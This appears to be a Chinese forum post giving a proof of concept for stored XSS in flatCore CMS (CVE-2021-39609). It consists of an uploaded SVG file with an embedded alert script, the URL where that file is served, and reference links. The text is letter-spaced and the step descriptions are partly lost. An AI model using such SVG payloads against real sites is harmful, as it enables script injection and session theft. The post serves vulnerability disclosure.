[29137] 2021-08-31_【漏洞利用】flatcoreCMSXSS

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-19
2021-08-31_【漏洞利用】flatcoreCMSXSS f l a t c o r e   C M S   X S S O t s   2 0 2 1 - 0 8 - 3 1 O t s X S S 1 .     f l a t c o r e   C M S 2 .   3 .     s v g     X S S   x s s . s v g 4 .     u r l     X S S h t t p : / / d o m a i n / c o n t e n t / i m a g e s / p a y l o a d 1 . s v g x s s . s v g < ? x m l   v e r s i o n = " 1 . 0 "   s t a n d a l o n e = " n o " ? > < ! D O C T Y P E   s v g   P U B L I C   " - / / W 3 C / / D T D   S V G   1 . 1 / / E N "   " h t t p : / / w w w . w 3 . o r g / G r a p h i c s / S V G / 1 . 1 / D T D / s v g 1 1 . d t d " > < s v g   v e r s i o n = " 1 . 1 "   b a s e P r o f i l e = " f u l l "   x m l n s = " h t t p : / / w w w . w 3 . o r g / 2 0 0 0 / s v g " >       < r e c t   w i d t h = " 3 0 0 "   h e i g h t = " 1 0 0 "   s t y l e = " f i l l : r g b ( 0 , 0 , 2 5 5 ) ; s t r o k e - w i d t h : 3 ; s t r o k e : r g b ( 0 , 0 , 0 ) "   / >       < s c r i p t   t y p e = " t e x t / j a v a s c r i p t " >             a l e r t ( " X S S   i n   f l a t C o r e   C M S " ) ; < / s c r i p t > < / s v g >
h t t p s : / / c v e . m i t r e . o r g / c g i - b i n / c v e n a m e . c g i ? n a m e = C V E - 2 0 2 1 - 3 9 6 0 9 h t t p s : / / g i t h u b . c o m / f l a t C o r e / f l a t C o r e - C M S / i s s u e s / 5 3   S X X   [ + ]   h t t p s : / / s t r e a m a b l e . c o m / p 1 3 h g j = P H P S S E S I D [ + ]   h t t p s : / / s t r e a m a b l e . c o m / 9 a j 8 o 6
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则